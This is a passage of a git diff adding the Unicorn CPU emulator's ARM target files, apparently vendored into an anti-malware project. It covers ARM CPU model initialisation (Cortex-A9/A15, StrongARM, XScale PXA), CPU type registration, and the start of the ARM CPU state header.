+ */ + set_feature(&cpu->env, ARM_FEATURE_V7MP); + set_feature(&cpu->env, ARM_FEATURE_CBAR); + cpu->midr = 0x410fc090; + cpu->reset_fpsid = 0x41033090; + cpu->mvfr0 = 0x11110222; + cpu->mvfr1 = 0x01111111; + cpu->ctr = 0x80038003; + cpu->reset_sctlr = 0x00c50078; + cpu->id_pfr0 = 0x1031; + cpu->id_pfr1 = 0x11; + cpu->id_dfr0 = 0x000; + cpu->id_afr0 = 0; + cpu->id_mmfr0 = 0x00100103; + cpu->id_mmfr1 = 0x20000000; + cpu->id_mmfr2 = 0x01230000; + cpu->id_mmfr3 = 0x00002111; + cpu->id_isar0 = 0x00101111; + cpu->id_isar1 = 0x13112111; + cpu->id_isar2 = 0x21232041; + cpu->id_isar3 = 0x11112131; + cpu->id_isar4 = 0x00111142; + cpu->dbgdidr = 0x35141000; + cpu->clidr = (1 << 27) | (1 << 24) | 3; + cpu->ccsidr[0] = 0xe00fe019; /* 16k L1 dcache. */ + cpu->ccsidr[1] = 0x200fe019; /* 16k L1 icache. */ + define_arm_cp_regs(cpu, cortexa9_cp_reginfo); +} + +#ifndef CONFIG_USER_ONLY +static uint64_t a15_l2ctlr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Linux wants the number of processors from here. + * Might as well set the interrupt-controller bit too. 
+ */ + return ((smp_cpus - 1) << 24) | (1 << 23); +} +#endif + +static const ARMCPRegInfo cortexa15_cp_reginfo[] = { +#ifndef CONFIG_USER_ONLY + { "L2CTLR", 15,9,0, 0,1,2, 0, + 0, PL1_RW, NULL, 0, 0, + NULL, a15_l2ctlr_read, arm_cp_write_ignore, }, +#endif + { "L2ECTLR", 15,9,0, 0,1,3, 0, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + REGINFO_SENTINEL +}; + +static void cortex_a15_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,cortex-a15"; + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + set_feature(&cpu->env, ARM_FEATURE_ARM_DIV); + set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); + set_feature(&cpu->env, ARM_FEATURE_LPAE); + cpu->kvm_target = QEMU_KVM_ARM_TARGET_CORTEX_A15; + cpu->midr = 0x412fc0f1; + cpu->reset_fpsid = 0x410430f0; + cpu->mvfr0 = 0x10110222; + cpu->mvfr1 = 0x11111111; + cpu->ctr = 0x8444c004; + cpu->reset_sctlr = 0x00c50078; + cpu->id_pfr0 = 0x00001131; + cpu->id_pfr1 = 0x00011011; + cpu->id_dfr0 = 0x02010555; + cpu->id_afr0 = 0x00000000; + cpu->id_mmfr0 = 0x10201105; + cpu->id_mmfr1 = 0x20000000; + cpu->id_mmfr2 = 0x01240000; + cpu->id_mmfr3 = 0x02102211; + cpu->id_isar0 = 0x02101110; + cpu->id_isar1 = 0x13112111; + cpu->id_isar2 = 0x21232041; + cpu->id_isar3 = 0x11112131; + cpu->id_isar4 = 0x10011142; + cpu->dbgdidr = 0x3515f021; + cpu->clidr = 0x0a200023; + cpu->ccsidr[0] = 0x701fe00a; /* 32K L1 dcache */ + cpu->ccsidr[1] = 0x201fe00a; /* 32K L1 icache */ + cpu->ccsidr[2] = 0x711fe07a; /* 4096K L2 unified cache */ + define_arm_cp_regs(cpu, cortexa15_cp_reginfo); +} + +static void ti925t_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_V4T); + set_feature(&cpu->env, 
ARM_FEATURE_OMAPCP); + cpu->midr = ARM_CPUID_TI925T; + cpu->ctr = 0x5109149; + cpu->reset_sctlr = 0x00000070; +} + +static void sa1100_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "intel,sa1100"; + set_feature(&cpu->env, ARM_FEATURE_STRONGARM); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x4401A11B; + cpu->reset_sctlr = 0x00000070; +} + +static void sa1110_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_STRONGARM); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x6901B119; + cpu->reset_sctlr = 0x00000070; +} + +static void pxa250_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052100; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa255_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052d00; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa260_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052903; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa261_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052d05; + cpu->ctr = 
0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa262_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + cpu->midr = 0x69052d06; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270a0_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054110; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270a1_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054111; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270b0_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054112; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270b1_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054113; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270c0_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU 
*cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054114; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +static void pxa270c5_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "marvell,xscale"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_XSCALE); + set_feature(&cpu->env, ARM_FEATURE_IWMMXT); + cpu->midr = 0x69054117; + cpu->ctr = 0xd172172; + cpu->reset_sctlr = 0x00000078; +} + +#ifdef CONFIG_USER_ONLY +static void arm_any_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_V8); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + set_feature(&cpu->env, ARM_FEATURE_V8_AES); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA1); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA256); + set_feature(&cpu->env, ARM_FEATURE_V8_PMULL); + set_feature(&cpu->env, ARM_FEATURE_CRC); + cpu->midr = 0xffffffff; +} +#endif + +#endif /* !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) */ + +typedef struct ARMCPUInfo { + const char *name; + void (*initfn)(struct uc_struct *uc, Object *obj, void *opaque); + void (*class_init)(struct uc_struct *uc, ObjectClass *oc, void *data); +} ARMCPUInfo; + +static const ARMCPUInfo arm_cpus[] = { +#if !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) + { "arm926", arm926_initfn }, + { "arm946", arm946_initfn }, + { "arm1026", arm1026_initfn }, + /* What QEMU calls "arm1136-r2" is actually the 1136 r0p2, i.e. an + * older core than plain "arm1136". In particular this does not + * have the v6K features. 
+ */ + { "arm1136-r2", arm1136_r2_initfn }, + { "arm1136", arm1136_initfn }, + { "arm1176", arm1176_initfn }, + { "arm11mpcore", arm11mpcore_initfn }, + { "cortex-m3", cortex_m3_initfn, arm_v7m_class_init }, + { "cortex-a8", cortex_a8_initfn }, + { "cortex-a9", cortex_a9_initfn }, + { "cortex-a15", cortex_a15_initfn }, + { "ti925t", ti925t_initfn }, + { "sa1100", sa1100_initfn }, + { "sa1110", sa1110_initfn }, + { "pxa250", pxa250_initfn }, + { "pxa255", pxa255_initfn }, + { "pxa260", pxa260_initfn }, + { "pxa261", pxa261_initfn }, + { "pxa262", pxa262_initfn }, + /* "pxa270" is an alias for "pxa270-a0" */ + { "pxa270", pxa270a0_initfn }, + { "pxa270-a0", pxa270a0_initfn }, + { "pxa270-a1", pxa270a1_initfn }, + { "pxa270-b0", pxa270b0_initfn }, + { "pxa270-b1", pxa270b1_initfn }, + { "pxa270-c0", pxa270c0_initfn }, + { "pxa270-c5", pxa270c5_initfn }, +#ifdef CONFIG_USER_ONLY + { "any", arm_any_initfn }, +#endif +#endif + { NULL } +}; + +static void arm_cpu_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + ARMCPUClass *acc = ARM_CPU_CLASS(uc, oc); + CPUClass *cc = CPU_CLASS(uc, acc); + DeviceClass *dc = DEVICE_CLASS(uc, oc); + + acc->parent_realize = dc->realize; + dc->realize = arm_cpu_realizefn; + //dc->props = arm_cpu_properties; + + acc->parent_reset = cc->reset; + cc->reset = arm_cpu_reset; + + cc->class_by_name = arm_cpu_class_by_name; + cc->has_work = arm_cpu_has_work; + cc->cpu_exec_interrupt = arm_cpu_exec_interrupt; + //cc->dump_state = arm_cpu_dump_state; + cc->set_pc = arm_cpu_set_pc; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = arm_cpu_handle_mmu_fault; +#else + cc->do_interrupt = arm_cpu_do_interrupt; + cc->get_phys_page_debug = arm_cpu_get_phys_page_debug; +#endif + cc->debug_excp_handler = arm_debug_excp_handler; +} + +static void cpu_register(struct uc_struct *uc, const ARMCPUInfo *info) +{ + TypeInfo type_info = { 0 }; + type_info.parent = TYPE_ARM_CPU; + type_info.instance_size = sizeof(ARMCPU); + type_info.instance_init = 
info->initfn; + type_info.class_size = sizeof(ARMCPUClass); + type_info.class_init = info->class_init; + + type_info.name = g_strdup_printf("%s-" TYPE_ARM_CPU, info->name); + type_register(uc, &type_info); + g_free((void *)type_info.name); +} + +void arm_cpu_register_types(void *opaque) +{ + const ARMCPUInfo *info = arm_cpus; + + TypeInfo arm_cpu_type_info = { 0 }; + arm_cpu_type_info.name = TYPE_ARM_CPU, + arm_cpu_type_info.parent = TYPE_CPU, + arm_cpu_type_info.instance_userdata = opaque, + arm_cpu_type_info.instance_size = sizeof(ARMCPU), + arm_cpu_type_info.instance_init = arm_cpu_initfn, + arm_cpu_type_info.instance_post_init = arm_cpu_post_init, + arm_cpu_type_info.instance_finalize = arm_cpu_finalizefn, + arm_cpu_type_info.abstract = true, + arm_cpu_type_info.class_size = sizeof(ARMCPUClass), + arm_cpu_type_info.class_init = arm_cpu_class_init, + + type_register_static(opaque, &arm_cpu_type_info); + + while (info->name) { + cpu_register(opaque, info); + info++; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.h new file mode 100644 index 0000000..5314cb4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.h @@ -0,0 +1,1548 @@ +/* + * ARM virtual CPU header + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#ifndef CPU_ARM_H +#define CPU_ARM_H + +#include "config.h" + +#include "kvm-consts.h" + +#if defined(TARGET_AARCH64) + /* AArch64 definitions */ +# define TARGET_LONG_BITS 64 +# define ELF_MACHINE EM_AARCH64 +#else +# define TARGET_LONG_BITS 32 +# define ELF_MACHINE EM_ARM +#endif + +#define CPUArchState struct CPUARMState + +#include "qemu-common.h" +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define TARGET_HAS_ICE 1 + +#define EXCP_UDEF 1 /* undefined instruction */ +#define EXCP_SWI 2 /* software interrupt */ +#define EXCP_PREFETCH_ABORT 3 +#define EXCP_DATA_ABORT 4 +#define EXCP_IRQ 5 +#define EXCP_FIQ 6 +#define EXCP_BKPT 7 +#define EXCP_EXCEPTION_EXIT 8 /* Return from v7M exception. */ +#define EXCP_KERNEL_TRAP 9 /* Jumped to kernel code page. */ +#define EXCP_STREX 10 +#define EXCP_HVC 11 /* HyperVisor Call */ +#define EXCP_HYP_TRAP 12 +#define EXCP_SMC 13 /* Secure Monitor Call */ +#define EXCP_VIRQ 14 +#define EXCP_VFIQ 15 + +#define ARMV7M_EXCP_RESET 1 +#define ARMV7M_EXCP_NMI 2 +#define ARMV7M_EXCP_HARD 3 +#define ARMV7M_EXCP_MEM 4 +#define ARMV7M_EXCP_BUS 5 +#define ARMV7M_EXCP_USAGE 6 +#define ARMV7M_EXCP_SVC 11 +#define ARMV7M_EXCP_DEBUG 12 +#define ARMV7M_EXCP_PENDSV 14 +#define ARMV7M_EXCP_SYSTICK 15 + +/* ARM-specific interrupt pending bits. */ +#define CPU_INTERRUPT_FIQ CPU_INTERRUPT_TGT_EXT_1 +#define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_EXT_2 +#define CPU_INTERRUPT_VFIQ CPU_INTERRUPT_TGT_EXT_3 + +/* The usual mapping for an AArch64 system register to its AArch32 + * counterpart is for the 32 bit world to have access to the lower + * half only (with writes leaving the upper half untouched). It's + * therefore useful to be able to pass TCG the offset of the least + * significant half of a uint64_t struct member. 
+ */ +#ifdef HOST_WORDS_BIGENDIAN +#define offsetoflow32(S, M) (offsetof(S, M) + sizeof(uint32_t)) +#define offsetofhigh32(S, M) offsetof(S, M) +#else +#define offsetoflow32(S, M) offsetof(S, M) +#define offsetofhigh32(S, M) (offsetof(S, M) + sizeof(uint32_t)) +#endif + +/* Meanings of the ARMCPU object's four inbound GPIO lines */ +#define ARM_CPU_IRQ 0 +#define ARM_CPU_FIQ 1 +#define ARM_CPU_VIRQ 2 +#define ARM_CPU_VFIQ 3 + +typedef void ARMWriteCPFunc(void *opaque, int cp_info, + int srcreg, int operand, uint32_t value); +typedef uint32_t ARMReadCPFunc(void *opaque, int cp_info, + int dstreg, int operand); + +struct arm_boot_info; + +#define NB_MMU_MODES 4 + +/* We currently assume float and double are IEEE single and double + precision respectively. + Doing runtime conversions is tricky because VFP registers may contain + integer values (eg. as the result of a FTOSI instruction). + s<2n> maps to the least significant half of d + s<2n+1> maps to the most significant half of d + */ + +/* CPU state for each instance of a generic timer (in cp15 c14) */ +typedef struct ARMGenericTimer { + uint64_t cval; /* Timer CompareValue register */ + uint64_t ctl; /* Timer Control register */ +} ARMGenericTimer; + +#define GTIMER_PHYS 0 +#define GTIMER_VIRT 1 +#define NUM_GTIMERS 2 + +typedef struct CPUARMState { + /* Regs for current mode. */ + uint32_t regs[16]; + + /* 32/64 switch only happens when taking and returning from + * exceptions so the overlap semantics are taken care of then + * instead of having a complicated union. + */ + /* Regs for A64 mode. */ + uint64_t xregs[32]; + uint64_t pc; + /* PSTATE isn't an architectural register for ARMv8. However, it is + * convenient for us to assemble the underlying state into a 32 bit format + * identical to the architectural format used for the SPSR. (This is also + * what the Linux kernel's 'pstate' field in signal handlers and KVM's + * 'pstate' register are.) 
Of the PSTATE bits: + * NZCV are kept in the split out env->CF/VF/NF/ZF, (which have the same + * semantics as for AArch32, as described in the comments on each field) + * nRW (also known as M[4]) is kept, inverted, in env->aarch64 + * DAIF (exception masks) are kept in env->daif + * all other bits are stored in their correct places in env->pstate + */ + uint32_t pstate; + uint32_t aarch64; /* 1 if CPU is in aarch64 state; inverse of PSTATE.nRW */ + + /* Frequently accessed CPSR bits are stored separately for efficiency. + This contains all the other bits. Use cpsr_{read,write} to access + the whole CPSR. */ + uint32_t uncached_cpsr; + uint32_t spsr; + + /* Banked registers. */ + uint64_t banked_spsr[8]; + uint32_t banked_r13[8]; + uint32_t banked_r14[8]; + + /* These hold r8-r12. */ + uint32_t usr_regs[5]; + uint32_t fiq_regs[5]; + + /* cpsr flag cache for faster execution */ + uint32_t CF; /* 0 or 1 */ + uint32_t VF; /* V is the bit 31. All other bits are undefined */ + uint32_t NF; /* N is bit 31. All other bits are undefined. */ + uint32_t ZF; /* Z set if zero. */ + uint32_t QF; /* 0 or 1 */ + uint32_t GE; /* cpsr[19:16] */ + uint32_t thumb; /* cpsr[5]. 0 = arm mode, 1 = thumb mode. */ + uint32_t condexec_bits; /* IT bits. cpsr[15:10,26:25]. */ + uint64_t daif; /* exception masks, in the bits they are in in PSTATE */ + + uint64_t elr_el[4]; /* AArch64 exception link regs */ + uint64_t sp_el[4]; /* AArch64 banked stack pointers */ + + /* System control coprocessor (cp15) */ + struct { + uint32_t c0_cpuid; + uint64_t c0_cssel; /* Cache size selection. */ + uint64_t c1_sys; /* System control register. */ + uint64_t c1_coproc; /* Coprocessor access register. */ + uint32_t c1_xscaleauxcr; /* XScale auxiliary control register. */ + uint64_t ttbr0_el1; /* MMU translation table base 0. */ + uint64_t ttbr1_el1; /* MMU translation table base 1. */ + uint64_t c2_control; /* MMU translation table base control. 
*/ + uint32_t c2_mask; /* MMU translation table base selection mask. */ + uint32_t c2_base_mask; /* MMU translation table base 0 mask. */ + uint32_t c2_data; /* MPU data cachable bits. */ + uint32_t c2_insn; /* MPU instruction cachable bits. */ + uint32_t c3; /* MMU domain access control register + MPU write buffer control. */ + uint32_t pmsav5_data_ap; /* PMSAv5 MPU data access permissions */ + uint32_t pmsav5_insn_ap; /* PMSAv5 MPU insn access permissions */ + uint64_t hcr_el2; /* Hypervisor configuration register */ + uint64_t scr_el3; /* Secure configuration register. */ + uint32_t ifsr_el2; /* Fault status registers. */ + uint64_t esr_el[4]; + uint32_t c6_region[8]; /* MPU base/size registers. */ + uint64_t far_el[4]; /* Fault address registers. */ + uint64_t par_el1; /* Translation result. */ + uint32_t c9_insn; /* Cache lockdown registers. */ + uint32_t c9_data; + uint64_t c9_pmcr; /* performance monitor control register */ + uint64_t c9_pmcnten; /* perf monitor counter enables */ + uint32_t c9_pmovsr; /* perf monitor overflow status */ + uint32_t c9_pmxevtyper; /* perf monitor event type */ + uint32_t c9_pmuserenr; /* perf monitor user enable */ + uint32_t c9_pminten; /* perf monitor interrupt enables */ + uint64_t mair_el1; + uint64_t vbar_el[4]; /* vector base address register */ + uint32_t c13_fcse; /* FCSE PID. */ + uint64_t contextidr_el1; /* Context ID. */ + uint64_t tpidr_el0; /* User RW Thread register. */ + uint64_t tpidrro_el0; /* User RO Thread register. */ + uint64_t tpidr_el1; /* Privileged Thread register. */ + uint64_t c14_cntfrq; /* Counter Frequency register */ + uint64_t c14_cntkctl; /* Timer Control register */ + ARMGenericTimer c14_timer[NUM_GTIMERS]; + uint32_t c15_cpar; /* XScale Coprocessor Access Register */ + uint32_t c15_ticonfig; /* TI925T configuration byte. */ + uint32_t c15_i_max; /* Maximum D-cache dirty line index. */ + uint32_t c15_i_min; /* Minimum D-cache dirty line index. 
*/ + uint32_t c15_threadid; /* TI debugger thread-ID. */ + uint32_t c15_config_base_address; /* SCU base address. */ + uint32_t c15_diagnostic; /* diagnostic register */ + uint32_t c15_power_diagnostic; + uint32_t c15_power_control; /* power control */ + uint64_t dbgbvr[16]; /* breakpoint value registers */ + uint64_t dbgbcr[16]; /* breakpoint control registers */ + uint64_t dbgwvr[16]; /* watchpoint value registers */ + uint64_t dbgwcr[16]; /* watchpoint control registers */ + uint64_t mdscr_el1; + /* If the counter is enabled, this stores the last time the counter + * was reset. Otherwise it stores the counter value + */ + uint64_t c15_ccnt; + uint64_t pmccfiltr_el0; /* Performance Monitor Filter Register */ + } cp15; + + struct { + uint32_t other_sp; + uint32_t vecbase; + uint32_t basepri; + uint32_t control; + int current_sp; + int exception; + int pending_exception; + } v7m; + + /* Information associated with an exception about to be taken: + * code which raises an exception must set cs->exception_index and + * the relevant parts of this structure; the cpu_do_interrupt function + * will then set the guest-visible registers as part of the exception + * entry process. + */ + struct { + uint32_t syndrome; /* AArch64 format syndrome register */ + uint32_t fsr; /* AArch32 format fault status register info */ + uint64_t vaddress; /* virtual addr associated with exception, if any */ + /* If we implement EL2 we will also need to store information + * about the intermediate physical address for stage 2 faults. + */ + } exception; + + /* Thumb-2 EE state. */ + uint32_t teecr; + uint32_t teehbr; + + /* VFP coprocessor state. */ + struct { + /* VFP/Neon register state. 
Note that the mapping between S, D and Q + * views of the register bank differs between AArch64 and AArch32: + * In AArch32: + * Qn = regs[2n+1]:regs[2n] + * Dn = regs[n] + * Sn = regs[n/2] bits 31..0 for even n, and bits 63..32 for odd n + * (and regs[32] to regs[63] are inaccessible) + * In AArch64: + * Qn = regs[2n+1]:regs[2n] + * Dn = regs[2n] + * Sn = regs[2n] bits 31..0 + * This corresponds to the architecturally defined mapping between + * the two execution states, and means we do not need to explicitly + * map these registers when changing states. + */ + float64 regs[64]; + + uint32_t xregs[16]; + /* We store these fpcsr fields separately for convenience. */ + int vec_len; + int vec_stride; + + /* scratch space when Tn are not sufficient. */ + uint32_t scratch[8]; + + /* fp_status is the "normal" fp status. standard_fp_status retains + * values corresponding to the ARM "Standard FPSCR Value", ie + * default-NaN, flush-to-zero, round-to-nearest and is used by + * any operations (generally Neon) which the architecture defines + * as controlled by the standard FPSCR value rather than the FPSCR. + * + * To avoid having to transfer exception bits around, we simply + * say that the FPSCR cumulative exception flags are the logical + * OR of the flags in the two fp statuses. This relies on the + * only thing which needs to read the exception flags being + * an explicit FPSCR read. + */ + float_status fp_status; + float_status standard_fp_status; + } vfp; + uint64_t exclusive_addr; + uint64_t exclusive_val; + uint64_t exclusive_high; +#if defined(CONFIG_USER_ONLY) + uint64_t exclusive_test; + uint32_t exclusive_info; +#endif + + /* iwMMXt coprocessor state. */ + struct { + uint64_t regs[16]; + uint64_t val; + + uint32_t cregs[16]; + } iwmmxt; + + /* For mixed endian mode. */ + bool bswap_code; + +#if defined(CONFIG_USER_ONLY) + /* For usermode syscall translation. 
*/ + int eabi; +#endif + + struct CPUBreakpoint *cpu_breakpoint[16]; + struct CPUWatchpoint *cpu_watchpoint[16]; + + CPU_COMMON + + /* These fields after the common ones so they are preserved on reset. */ + + /* Internal CPU feature flags. */ + uint64_t features; + + void *nvic; + const struct arm_boot_info *boot_info; + + // Unicorn engine + struct uc_struct *uc; +} CPUARMState; + +#include "cpu-qom.h" + +ARMCPU *cpu_arm_init(struct uc_struct *uc, const char *cpu_model); +int cpu_arm_exec(struct uc_struct *uc, CPUARMState *s); +uint32_t do_arm_semihosting(CPUARMState *env); + +static inline bool is_a64(CPUARMState *env) +{ + return env->aarch64; +} + +/* you can call this signal handler from your SIGBUS and SIGSEGV + signal handlers to inform the virtual CPU of exceptions. non zero + is returned if the signal was handled by the virtual CPU. */ +int cpu_arm_signal_handler(int host_signum, void *pinfo, + void *puc); +int arm_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); + +/** + * pmccntr_sync + * @env: CPUARMState + * + * Synchronises the counter in the PMCCNTR. This must always be called twice, + * once before any action that might affect the timer and again afterwards. + * The function is used to swap the state of the register if required. + * This only happens when not in user mode (!CONFIG_USER_ONLY) + */ +void pmccntr_sync(CPUARMState *env); + +/* SCTLR bit meanings. Several bits have been reused in newer + * versions of the architecture; in that case we define constants + * for both old and new bit meanings. Code which tests against those + * bits should probably check or otherwise arrange that the CPU + * is the architectural version it expects. 
+ */ +#define SCTLR_M (1U << 0) +#define SCTLR_A (1U << 1) +#define SCTLR_C (1U << 2) +#define SCTLR_W (1U << 3) /* up to v6; RAO in v7 */ +#define SCTLR_SA (1U << 3) +#define SCTLR_P (1U << 4) /* up to v5; RAO in v6 and v7 */ +#define SCTLR_SA0 (1U << 4) /* v8 onward, AArch64 only */ +#define SCTLR_D (1U << 5) /* up to v5; RAO in v6 */ +#define SCTLR_CP15BEN (1U << 5) /* v7 onward */ +#define SCTLR_L (1U << 6) /* up to v5; RAO in v6 and v7; RAZ in v8 */ +#define SCTLR_B (1U << 7) /* up to v6; RAZ in v7 */ +#define SCTLR_ITD (1U << 7) /* v8 onward */ +#define SCTLR_S (1U << 8) /* up to v6; RAZ in v7 */ +#define SCTLR_SED (1U << 8) /* v8 onward */ +#define SCTLR_R (1U << 9) /* up to v6; RAZ in v7 */ +#define SCTLR_UMA (1U << 9) /* v8 onward, AArch64 only */ +#define SCTLR_F (1U << 10) /* up to v6 */ +#define SCTLR_SW (1U << 10) /* v7 onward */ +#define SCTLR_Z (1U << 11) +#define SCTLR_I (1U << 12) +#define SCTLR_V (1U << 13) +#define SCTLR_RR (1U << 14) /* up to v7 */ +#define SCTLR_DZE (1U << 14) /* v8 onward, AArch64 only */ +#define SCTLR_L4 (1U << 15) /* up to v6; RAZ in v7 */ +#define SCTLR_UCT (1U << 15) /* v8 onward, AArch64 only */ +#define SCTLR_DT (1U << 16) /* up to ??, RAO in v6 and v7 */ +#define SCTLR_nTWI (1U << 16) /* v8 onward */ +#define SCTLR_HA (1U << 17) +#define SCTLR_IT (1U << 18) /* up to ??, RAO in v6 and v7 */ +#define SCTLR_nTWE (1U << 18) /* v8 onward */ +#define SCTLR_WXN (1U << 19) +#define SCTLR_ST (1U << 20) /* up to ??, RAZ in v6 */ +#define SCTLR_UWXN (1U << 20) /* v7 onward */ +#define SCTLR_FI (1U << 21) +#define SCTLR_U (1U << 22) +#define SCTLR_XP (1U << 23) /* up to v6; v7 onward RAO */ +#define SCTLR_VE (1U << 24) /* up to v7 */ +#define SCTLR_E0E (1U << 24) /* v8 onward, AArch64 only */ +#define SCTLR_EE (1U << 25) +#define SCTLR_L2 (1U << 26) /* up to v6, RAZ in v7 */ +#define SCTLR_UCI (1U << 26) /* v8 onward, AArch64 only */ +#define SCTLR_NMFI (1U << 27) +#define SCTLR_TRE (1U << 28) +#define SCTLR_AFE (1U << 29) 
